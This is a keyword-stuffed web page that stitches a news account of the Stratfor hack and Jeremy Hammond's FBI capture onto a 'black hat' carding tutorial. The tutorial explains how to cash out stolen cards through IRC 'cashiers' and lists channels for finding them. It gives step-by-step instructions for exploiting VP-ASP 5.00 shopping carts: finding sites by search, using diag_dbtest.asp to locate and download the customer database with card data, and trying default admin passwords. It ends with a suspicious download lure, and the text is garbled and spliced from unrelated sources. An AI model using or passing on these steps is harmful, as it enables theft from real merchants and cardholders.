Hack Credit Card On Irc

  

On December 6, 2011, a hacker using the handle 'sup_g' private-messaged Hector Xavier Monsegur, otherwise known as 'Sabu,' on Anonymous's IRC server to tell him of a server he had gained access to. But 'sup_g'—alleged by the government to be Jeremy Hammond—didn't know that the whole conversation was being logged by the FBI, and that Monsegur had turned confidential informant. 'Yo, you round? working on this new target.'

Federal prosecutors said on Thursday they have charged five men responsible for a hacking and credit card fraud spree that cost companies more $300 million and two of the suspects are in custody. A credit card generator used to create dummy credit card numbers for ethical purposes. This tool works on a software program that generates 100% unique valid numbers for the credit cards. There are times when you are required to give your credit card number details for business purposes or for system testing sites.

The tale of Sabu's arrest and LulzSec's fall:

The target was the server of Stratfor, the Austin-based global intelligence company that would soon become synonymous with the hacker phrase, 'pwned.' Over the course of the Anonymous cell Antisec's hacking and exploiting of the company's IT infrastructure, the group of hackers would expose credit card and other personal information of over 60,000 Stratfor customers and a vast archive of e-mail correspondence between the company's employees and customers in the private and government sectors. And it all started with a control panel hack.

According to the FBI, Hammond, also more widely known by the handle 'Anarchaos,' sent Monsegur a link on a TOR network hidden server to a screenshot of Stratfor's administrative panel for its website. Antisec has used panel hacks to exploit a number of other sites, including the Federal Trade Commission's sites hosted on Media Temple.

Using SQL injection exploits against interfaces to the Web administration application, hackers have been able to gain low-level control over sites and do with them what they will. But in the process of exploiting the control panel, Hammond found there was potential for more than just a simple Web defacement in the Stratfor site. 'This site is a paid membership where they gain access to articles,' he messaged Monsegur . 'It stores billing as well - cards. It's encrypted though. I think I can reverse it though but the encryption keys are store[d] on their server (which we can use mysql to read).'

Advertisement

Hammond said that once he found the keys, he could write a script to export the data 'en mass[e].'

As it turns out, the credit card numbers were not encrypted, but stored in plaintext in Stratfor's MySQL database. So once Hammond gained access to the database, he and others were able to export all of the data. Next, he turned to the e-mail system and other server applications running Stratfor's intranet—all of which ran within the same hosting service at Austin-based Core NAP.

By December 14, according to the FBI's investigation, Hammond had managed to 'root' Stratfor's mail server as well. In a chat on an IRC channel named #lulzxmas, he told another Anonymous member, 'we in business baby…time to feast upon their spools.'

He noted that in their e-mails, employees at Stratfor had been complaining about downtime—possibly caused by Hammond gaining control of the server. Hammond and others not named in the indictment discussed options for offloading the data for viewing on hidden TOR sites, including using stolen credit card information to secure servers. Hammond decided to put off using credit card data until after the end of December—so that the charges wouldn't hit their owners' statements until the end of January.

At the instruction of the FBI, Monsegur offered Hammond a server to store the data being extracted from Stratfor. Hammond agreed, and told others that they would use Monsegur's server as a 'first base of operations' before moving it elsewhere.

Advertisement

On December 24, the group showed its hand somewhat with the defacement of Stratfor's site, the deleting of the contents of four servers, and posting of 30,000 of the credit card numbers that had been stolen from the site's database—plus evidence of 'donations' made with some of them to charities such as the Red Cross.

But some of the card numbers were held in reserve, and the hacking wasn't done. Again in IRC, on December 26, Hammond told another Antisec member that he had logged into Stratfor's Clearspace collaboration server, and had found reports for the New York Police Department's SHIELD counterterrorism partnership program.

At the same time, he reported that he and others in the group had isolated 50,000 accounts of site users with military and government e-mail addresses, and had cracked the hash of the passwords for 4,500 of them, in hopes of using them for other efforts. By January 11, the group working with Hammond had started to unpack the contents of the Stratfor servers onto the server provided by Monesgur—providing a treasure trove of evidence for the FBI.

Getting nailed

The FBI tracked down Hammond with information he had shared in IRC logs from different aliases, and by tying those aliases together with the help of Monsegur. Hammond gave away his location by revealing last August that friends of his had been arrested at the 'Midwest Rising' protest in St. Louis on August 15. In another chat, he revealed that he had been arrested in New York City in 2004 during the Republican National Convention. And he also revealed information that indicated he had served time in a federal prison.

Using federal criminal records and other data, FBI investigators were able to narrow the field of suspects rapidly. The FBI had dealt with Hammond before—he had been arrested in March of 2005 for hacking into the site of Protest Warrior, a conservative political activist group, and stealing its database, including credit card information. He served two years in federal prison, followed by three years of supervised release.

Listing image by Photograph by chris riebschlager

Hi there. This is my first serious 'Black Hat Hacking' post of credit cards hacking. Here will be explained all methods used to hack credit cards and bank accounts with lots of $ it. Now I?m sure most of you think that this is fake or scam, but i want to just tell u this is real and the only working method (in my opinion) to hack a credit card and make your wish come true (lol, hope it doesn't sound like a commercial).

Note: Hacking credit cards is an illegal act, this is only informational post and I am not responsible for any actions done by you after reading this tutorial. This post is for educational purposes only.
Lets start with some easy terms.
What is credit card ?
Hack Credit Card On IrcCredit cards are of two types:
  • Debit Card
  • Credit Card

1. Debit means u have a sum of amount in it and u can use them.
2. Credit means u have a credit line limit like of $10000 and you can use them and by the end of month pay it to bank.
To use a credit card on internet u just not need cc number and expiry but u need many info like :

Hack Credit Card On Irc 1031


  • First name
  • Last name
  • Address
  • City
  • State
  • Zip
  • Country
  • Phone
  • CC number
  • Expiry
  • CVV2 ( this is 3digit security code on backside after signature panel )

If you get that info you can use that to buy any thing on internet, like software license, porn site membership, proxy membership, or any thing (online services usually, like webhosting, domains).
If u want to make money $ through hacking then you need to be very lucky? you need to have a exact bank and bin to cash that credit card through ATM machines.
Let me explain how ?
First study some simple terms.
BINS = first 6 digit of every credit card is called 'BIN' (for example cc number is : 4121638430101157 then its bin is '412163'), i hope this is easy to understand.Hack credit card on irc 401
Now the question is how to make money through credit cards. Its strange?, well you cant do that, but there is specific persons in world who can do that. They call them selves 'cashiers'. You can take some time to find a reliable cashiers.
Be sure cashiers are legit, because many cashiers r there which take your credit card and rip u off and don't send your 50% share back.
You can also find some cashiers on mIRC *( /server irc.unixirc.net:6667 ) channel : #cashout, #ccpower
Well, check the website where u have list of bins and banks mostly 101% cashable. If u get the credit card of the same bank with same bin, then u can cashout otherwise not . Remember for using credit card on internet u don't need PIN ( 4 words password which u enter in ATM Machine ), but for cashout u need. You can get pins only by 2nd method of hacking which i still not post but i will. First method of sql injection and shopadmin hacking don't provide with pins, it only give cc numb cvv2 and other info which usually need for shopping not for cashing.
  • Credit Card Hacking
  • CC (Credit Cards) can be hacked by two ways:
  • Credit Card Scams ( usually used for earning money , some times for shopping )
  • Credit Card Shopadmin Hacking ( just for fun, knowledge, shopping on internet )

1. Shopadmin Hacking
This method is used for testing the knowledge or for getting the credit card for shopping on internet, or for fun, or any way but not for cashing ( because this method don?t give PIN - 4 digit passcode ) only gives cc numb , cvv2 and other basic info.
Shopadmins are of different companies, like: VP-ASP , X CART, etc. This tutorial is for hacking VP-ASP SHOP.
I hope u seen whenever u try to buy some thing on internet with cc, they show u a well programmed form, very secure. They are carts, like vp-asp xcarts. Specific sites are not hacked, but carts are hacked.
Below I?m posting tutorial to hack VP ASP cart. Now every site which use that cart can be hacked, and through their *mdb file u can get their clients 'credit card details', and also login name and password of their admin area, and all other info of clients and comapny secrets.
Lets start:
Hack Credit Card On IrcHack Credit Card On Irc
  • Type: VP-ASP Shopping Cart
  • Version: 5.00
  • How to find VP-ASP 5.00 sites?
  • Finding VP-ASP 5.00 sites is so simple?

1. Go to google.com and type: VP-ASP Shopping Cart 5.00
2. You will find many websites with VP-ASP 5.00 cart software installed
Now let's go to the exploit..
The page will be like this: ****://***.victim.com/shop/shopdisplaycategories.asp
The exploit is: diag_dbtest.asp
Now you need to do this: ****://***.victim.com/shop/diag_dbtest.asp
A page will appear contain those:
  • xDatabase
  • shopping140
  • xDblocation
  • resx
  • xdatabasetypexEmailxEmail NamexEmailSubjectxEmailSy stemxEmailTypexOrdernumber

Example:
The most important thing here is xDatabase
xDatabase: shopping140
Ok, now the URL will be like this: ****://***.victim.com/shop/shopping140.mdb
If you didn?t download the Database, try this while there is dblocation:Credit
xDblocation
resx
the url will be: ****://***.victim.com/shop/resx/shopping140.mdb
If u see the error message you have to try this :
****://***.victim.com/shop/shopping500.mdb
Download the mdb file and you should be able to open it with any mdb file viewer, you should be able to find one at download.com, or use MS Office Access.
Inside you should be able to find credit card information, and you should even be able to find the admin username and password for the website.
The admin login page is usually located here: ****://***.victim.com/shop/shopadmin.asp
If you cannot find the admin username and password in the mdb file or you can but it is incorrect, or you cannot find the mdb file at all, then try to find the admin login page and enter the default passwords which are:
Username: admin
password: admin
OR
Username: vpasp
password: vpasp
The Method is almost Perfect Not without this Simple Piece of Software that I my Self had Develop
This Hack Is very Dangerous and Powerful Use it With your Own Risk!!!

Hack Credit Card On Irc Rules




Mirror Download

Hack Credit Card On Irc 501


Hack Credit Card On Irc 401